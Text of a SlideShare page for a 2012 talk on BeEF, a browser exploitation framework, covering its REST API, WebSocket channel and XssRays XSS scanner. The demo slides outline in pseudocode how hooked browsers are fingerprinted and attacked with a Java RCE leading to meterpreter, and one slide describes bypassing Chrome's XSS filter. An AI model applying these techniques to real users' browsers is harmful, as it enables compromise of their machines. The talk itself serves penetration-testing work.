SlideShare uma empresa Scribd logo

Advances in BeEF - AthCon2012

Michele Orru
Michele Orru
TecnologiaDiversão e humor
1 de 25
Baixar para ler offline
Advances in BeEF RESTful API, WebSockets, XssRays Michele “antisnatchor” Orru’ 2012 - Athens - 4 May 2012 Saturday, May 5, 12
Who am I? - Senior Security Consultant @ TW SpiderLabs - BeEF lead core developer - Application Security researcher - OpenBSD, Ruby and Javascript addict - @antisnatchor - http://antisnatchor.com Saturday, May 5, 12
What is BeEF? Browser Exploitation Framework Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. Saturday, May 5, 12
What is BeEF? Saturday, May 5, 12
Outline Saturday, May 5, 12
Outline 1. The need to be RESTful: the new API II. The need to be speedy: WebSockets support III. I want more XSSs: XssRays enhancements IV. demos and fun :D Saturday, May 5, 12
The need to be RESTful - I hate SOAP - I hate XML-RPC - I love to use protocol (HTTP) features without reinventing the wheel Saturday, May 5, 12
The need to be RESTful Ruby + Sinatra + JSON = WIN get ‘/to/a/pub’ “BeER please” end Saturday, May 5, 12
The need to be RESTful - programmatically control BeEF with whatever eats HTTP and JSON (bash + curl?) - facilitate integration with third tools (ZAP?) - create your own custom UI/GUI (mobile?) Saturday, May 5, 12
The need to be RESTful More info: - http://blog.beefproject.com/2012/03/restful-api-from- antisnatchor-with-love.html - http://blog.beefproject.com/2012/03/restful-api-demo.html Read the doc, you lazy! - https://github.com/beefproject/beef/wiki/BeEF-RESTful-API Saturday, May 5, 12
The need to be RESTful Demo time Pwn hooked browsers with JDK <= 1.6.0_27 1. get hooked browsers type/version/OS/plugins II. if browserIsIE createOverlayIframe(Above) else launchManInTheBrowser end III. if javaEnabled launchGetSystemInfo IV. if JDK <= 1.6.0_27 launchRhinoRCE V. enjoy Java meterpreter Saturday, May 5, 12
The need to be speedy: WS BeEF communication channel uses XHR-polling Pros: - works everywhere (we support IE, Chrome, Safari, Firefox, Opera and mobile browsers) Cons: - not efficient, data overhead Saturday, May 5, 12
The need to be speedy: WS Meet WebSocket support in BeEF XHR-polling Saturday, May 5, 12
The need to be speedy: WS Meet WebSocket support in BeEF XHR-polling WebSockets Saturday, May 5, 12
The need to be speedy: WS If beef.browser.hasWebSocket() don’t use XHR-polling, open a WebSocket channel currently supported: Firefox, Chrome, Safari also MozWebSocket (damn prefixes #$*(%$) speaks hixie-75, hixie-76, hybi-07, hybi-10 Saturday, May 5, 12
The need to be speedy: WS still experimental in BeEF (bugfixing/testing phase) clone https://github.com/radoen/beef-radoen to give it a try opens a whole new range of possible features - real time VNC-like hooked browser control - faster Tunneling proxy (fuzzing through the hooked browser 4/5 times faster) - general faster communication Saturday, May 5, 12
The need to be speedy: WS demo time - launch 1000 return_long_string modules, both normal XHR-polling and WebSockets Saturday, May 5, 12
I want more XSSs: XssRays Originally developed by Gareth Heyes in 2009 as a pure JS- based XSS scanner. Then integrated in BeEF. XssRays basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path creating hidden iFrames. Who uses FrameBusting/X-Frame-Options out there :-)? Saturday, May 5, 12
I want more XSSs: XssRays We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). Also means false-positive free. Potential false-negatives as we blindly inject vectors. Basically the document.location.href of the injected iFrame that contains the vector will point to a known BeEF resource. Saturday, May 5, 12
I want more XSSs: XssRays Saturday, May 5, 12
I want more XSSs: XssRays It also works cross-domain (respecting the SOP) Saturday, May 5, 12
I want more XSSs: XssRays Enhancements from previous months: - added more attack vectors double URL encoded, double nibble, DOM based injections - added Chrome/Safari support base64‘ing the iFrame src in order to bypass the XSS filter - added IE6 to IE9 support did you know that in IE6 location.pathname doesn’t contains the first forward slash? (thanks Gareth) Saturday, May 5, 12
Thanks Thanks to my BeEFfy friends: Wade, Christian, Brendan, Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may have forgotten Our new blogger Heather P. SpiderLabs because I don’t have to take holidays to be here Special thanks to Kyprianos and Chris Saturday, May 5, 12
Thanks follow us: @beefproject main site: http://beefproject.com the new blog: http://blog.beefproject.com github page: https://github.com/beefproject/beef (Please note: we’ll not pay you. You know we love OpenSource :-) Saturday, May 5, 12
Questions? Saturday, May 5, 12

Recomendados

Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorial
imlaurel2
 
BeEF
BeEFBeEF
BeEF
AlexandraLacatus
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 

Recomendados

Be ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orruBe ef presentation-securitybyte2011-michele_orru
Be ef presentation-securitybyte2011-michele_orru
Michele Orru
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
Hacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorruHacktivity2011 be ef-preso_micheleorru
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
Buried by time, dust and BeEF
Buried by time, dust and BeEFBuried by time, dust and BeEF
Buried by time, dust and BeEF
Michele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsI'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
Browser Exploitation Framework Tutorial
Browser Exploitation Framework TutorialBrowser Exploitation Framework Tutorial
Browser Exploitation Framework Tutorial
imlaurel2
 
BeEF
BeEFBeEF
BeEF
AlexandraLacatus
 
WordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invadersWordPress Security: Defend yourself against digital invaders
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Framework
awiasecretary
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEF
Michele Orru
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
Exploiting Firefox Extensions
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
Roberto Suggi Liverani
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
Bart Leppens
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
dsero
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
tomasperezv
 
Php push notifications
Php push notificationsPhp push notifications
Php push notifications
Mohammed Shurrab
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
Roberto Suggi Liverani
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
Vladimír Smitka
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScript
jeresig
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
n|u - The Open Security Community
 
Dissecting exploit activity
Dissecting exploit activityDissecting exploit activity
Dissecting exploit activity
n|u - The Open Security Community
 
PHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWSPHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWS
benwaine
 
Use drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibrationUse drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibration
Kevin Wenger
 

Mais conteúdo relacionado

Mais procurados

Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Framework
awiasecretary
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEF
Michele Orru
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
Exploiting Firefox Extensions
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
Roberto Suggi Liverani
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
dsero
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
Roberto Suggi Liverani
 

Mais procurados (20)

Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
 
BeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation FrameworkBeEF: The Browser Exploitation Framework
BeEF: The Browser Exploitation Framework
 
I'm the butcher would you like some BeEF
I'm the butcher would you like some BeEFI'm the butcher would you like some BeEF
I'm the butcher would you like some BeEF
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Cross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitationCross Context Scripting attacks & exploitation
Cross Context Scripting attacks & exploitation
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Advanced Chrome extension exploitation
Advanced Chrome extension exploitationAdvanced Chrome extension exploitation
Advanced Chrome extension exploitation
 
Exploiting Firefox Extensions
Exploiting Firefox ExtensionsExploiting Firefox Extensions
Exploiting Firefox Extensions
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
MySQL Tips for WordPress
MySQL Tips for WordPressMySQL Tips for WordPress
MySQL Tips for WordPress
 
Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012Window Shopping Browser - Bug Hunting in 2012
Window Shopping Browser - Bug Hunting in 2012
 
Sandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorageSandboxed platform using IFrames, postMessage and localStorage
Sandboxed platform using IFrames, postMessage and localStorage
 
Php push notifications
Php push notificationsPhp push notifications
Php push notifications
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacks
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
WordPress performance tuning
WordPress performance tuningWordPress performance tuning
WordPress performance tuning
 
The Future of Firefox and JavaScript
The Future of Firefox and JavaScriptThe Future of Firefox and JavaScript
The Future of Firefox and JavaScript
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Dissecting exploit activity
Dissecting exploit activityDissecting exploit activity
Dissecting exploit activity
 

Semelhante a Advances in BeEF - AthCon2012

PHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWSPHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWS
benwaine
 
Use drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibrationUse drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibration
Kevin Wenger
 
Frozen Rails Slides
Frozen Rails SlidesFrozen Rails Slides
Frozen Rails Slides
carllerche
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
Open End To End Js Stack
Open End To End Js StackOpen End To End Js Stack
Open End To End Js Stack
Skills Matter
 
(In)Secure Ajax-Y Websites With PHP
(In)Secure Ajax-Y Websites With PHP(In)Secure Ajax-Y Websites With PHP
(In)Secure Ajax-Y Websites With PHP
chw
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
whittemorelucilla
 

Semelhante a Advances in BeEF - AthCon2012 (20)

PHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWSPHPNW14 - Getting Started With AWS
PHPNW14 - Getting Started With AWS
 
Use drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibrationUse drupal 8 as a framework the romance recalibration
Use drupal 8 as a framework the romance recalibration
 
Frozen Rails Slides
Frozen Rails SlidesFrozen Rails Slides
Frozen Rails Slides
 
PHP: The Beginning and the Zend
PHP: The Beginning and the ZendPHP: The Beginning and the Zend
PHP: The Beginning and the Zend
 
[4developers2016] The ultimate mobile DX using JS as a primary language (Fato...
[4developers2016] The ultimate mobile DX using JS as a primary language (Fato...[4developers2016] The ultimate mobile DX using JS as a primary language (Fato...
[4developers2016] The ultimate mobile DX using JS as a primary language (Fato...
 
Setting up a free open source java e-commerce website
Setting up a free open source java e-commerce websiteSetting up a free open source java e-commerce website
Setting up a free open source java e-commerce website
 
HTML5, are we there yet?
HTML5, are we there yet?HTML5, are we there yet?
HTML5, are we there yet?
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012
 
Riding on rails3 with full stack of gems
Riding on rails3 with full stack of gemsRiding on rails3 with full stack of gems
Riding on rails3 with full stack of gems
 
2016 03 15_biological_databases_part4
2016 03 15_biological_databases_part42016 03 15_biological_databases_part4
2016 03 15_biological_databases_part4
 
Open End To End Js Stack
Open End To End Js StackOpen End To End Js Stack
Open End To End Js Stack
 
Picking the Right Node.js Framework for Your Use Case
Picking the Right Node.js Framework for Your Use CasePicking the Right Node.js Framework for Your Use Case
Picking the Right Node.js Framework for Your Use Case
 
(In)Secure Ajax-Y Websites With PHP
(In)Secure Ajax-Y Websites With PHP(In)Secure Ajax-Y Websites With PHP
(In)Secure Ajax-Y Websites With PHP
 
Google Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docxGoogle Hacking Lab ClassNameDate This is an introducti.docx
Google Hacking Lab ClassNameDate This is an introducti.docx
 
December 4 SDForum Java Sig Presentation
December 4 SDForum Java Sig PresentationDecember 4 SDForum Java Sig Presentation
December 4 SDForum Java Sig Presentation
 
Node.js Frameworks & Design Patterns Webinar
Node.js Frameworks & Design Patterns WebinarNode.js Frameworks & Design Patterns Webinar
Node.js Frameworks & Design Patterns Webinar
 
Apache Bigtop and ARM64 / AArch64 - Empowering Big Data Everywhere
Apache Bigtop and ARM64 / AArch64 - Empowering Big Data EverywhereApache Bigtop and ARM64 / AArch64 - Empowering Big Data Everywhere
Apache Bigtop and ARM64 / AArch64 - Empowering Big Data Everywhere
 
Consegi 2010 - Dicas de Desenvolvimento Web com Ruby
Consegi 2010 - Dicas de Desenvolvimento Web com RubyConsegi 2010 - Dicas de Desenvolvimento Web com Ruby
Consegi 2010 - Dicas de Desenvolvimento Web com Ruby
 
Dean4j@Njug5
Dean4j@Njug5Dean4j@Njug5
Dean4j@Njug5
 
Can we make es6 the baseline of the “modern web”? - BrazilJS 2105
Can we make es6 the baseline of the “modern web”? - BrazilJS 2105 Can we make es6 the baseline of the “modern web”? - BrazilJS 2105
Can we make es6 the baseline of the “modern web”? - BrazilJS 2105
 

Mais de Michele Orru

Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
Michele Orru
 

Mais de Michele Orru (7)

Practical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon XPractical Phishing Automation with PhishLulz - KiwiCon X
Practical Phishing Automation with PhishLulz - KiwiCon X
 
Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)Dark Fairytales from a Phisherman (Vol. II)
Dark Fairytales from a Phisherman (Vol. II)
 
Dark Fairytales from a Phisherman
Dark Fairytales from a PhishermanDark Fairytales from a Phisherman
Dark Fairytales from a Phisherman
 
ZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchorZeroNights2012_BeEF_Workshop_antisnatchor
ZeroNights2012_BeEF_Workshop_antisnatchor
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
 
BeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-OrruBeEF_EUSecWest-2012_Michele-Orru
BeEF_EUSecWest-2012_Michele-Orru
 
DeepSec2011_GroundBeEF
DeepSec2011_GroundBeEFDeepSec2011_GroundBeEF
DeepSec2011_GroundBeEF
 

Último

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 

Último (20)

Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 

Advances in BeEF - AthCon2012

  • 1. Advances in BeEF RESTful API, WebSockets, XssRays Michele “antisnatchor” Orru’ 2012 - Athens - 4 May 2012 Saturday, May 5, 12
  • 2. Who am I? - Senior Security Consultant @ TW SpiderLabs - BeEF lead core developer - Application Security researcher - OpenBSD, Ruby and Javascript addict - @antisnatchor - http://antisnatchor.com Saturday, May 5, 12
  • 3. What is BeEF? Browser Exploitation Framework Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse. The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context. Saturday, May 5, 12
  • 6. Outline 1. The need to be RESTful: the new API II. The need to be speedy: WebSockets support III. I want more XSSs: XssRays enhancements IV. demos and fun :D Saturday, May 5, 12
  • 7. The need to be RESTful - I hate SOAP - I hate XML-RPC - I love to use protocol (HTTP) features without reinventing the wheel Saturday, May 5, 12
  • 8. The need to be RESTful Ruby + Sinatra + JSON = WIN get ‘/to/a/pub’ “BeER please” end Saturday, May 5, 12
